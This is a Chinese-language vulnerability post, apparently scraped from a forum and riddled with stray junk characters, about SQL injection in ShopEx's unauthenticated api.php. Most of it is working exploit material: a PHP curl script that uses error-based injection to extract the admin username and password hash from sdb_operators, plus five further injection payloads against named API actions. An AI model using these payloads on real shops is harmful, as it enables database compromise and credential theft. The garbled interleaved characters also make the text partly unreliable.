|
缺陷文件:\core\api\payment\2.0\api_b2b_2_0_payment_cfg.php
8 W- j. d' }2 ^ T2 Score\api\payment\1.0\api_b2b_2_0_payment_cfg.php
0 g5 b1 Z7 \. P6 |
- O+ M# L8 |+ R8 m: F. w" ]& D- H6 [第44行 $data['columns'] 未做过滤导致注入6 [4 k$ n* W3 b4 i- w
4 O0 T3 }! P1 W7 Y9 ~* e5 p( v1 J7 m3 a
<?php set_time_limit(0); ob_flush(); echo 'Test: http://localhost:808'."\r\n"; $sql = 'columns=* from sdb_payment_cfg WHERE 1 and (select 1 from(select count(*),concat((select (select (SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#&disabled=1'; $url='http://localhost:808/api.php?act=search_payment_cfg_list&api_version=2.0'; $ch = curl_init(); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_POSTFIELDS, $sql); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); flush(); $data = curl_exec($ch); echo $data; curl_close($ch); ?>外带一句 ShopEx对API操作的模块未做认证,任何用户都可访问,攻击者可通过它来对产品的分类,类型,规格,品牌等,进行添加,删除和修改,过滤不当还可造成注入., C" _& q: ?, ?; M3 i
" Z/ G5 ^7 J' X3 R9 T0 m- o8 K7 D
注射1:/ U- D K/ D' j: O0 b! B" w
' ]# l4 E) D) {$ k9 phttp://www.0day5.com/api.php POST act=search_sub_regions&api_version=1.0&return_data=string&p_region_id=22 and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)#
) K. v* \! e S0 b% }8 K5 _ o
( D& o, B( D5 e! S0 \& G注射2:
3 a: x& W2 X6 D9 g8 F# B+ I% nhttp://www.0day5.com/shopex/api.php act=add_category&api_version=3.1&datas={"name":"name' and 1=x %23"}
( j5 z. v5 B0 c' c2 L9 z. }$ t; V# ?! ]/ n5 z# N/ F3 n
注射3:* `. I4 q1 i8 R/ d( }, p$ u5 V2 g) F
http://www.0day5.com/shopex/api.php act=get_spec_single&api_version=3.1&spec_id=1 xxx! A1 y8 J' L l5 W9 ?0 y/ W
注射4:
: v- d4 k- Q5 @6 P+ Z8 N- ]; `/ O% m
http://www.0day5.com/shopex/api.php act=online_pay_center&api_version=1.0&order_id=1x&pay_id=1¤cy=1
& U' s, B5 y5 g. Y5 u3 `6 u l( k& X/ w5 [1 w6 E0 l
' ^% k# G; X1 M! ~5 F D
注射5:
0 b' t9 Q. ?) k. E- j http://www.0day5.com/shopex/api.php act=search_dly_h_area&return_data=string&columns=xxxxx* L X4 D m- ]* g9 r6 b
/ M$ u ~( q: K: N( r& Q
) b. h( I8 F7 i2 y! O. w' x( C- j* L* j$ T
" Q, ~' E% w/ d& p$ T
& L1 G1 E; [1 Q& f" H6 K: |4 \, Y4 `1 d
|
|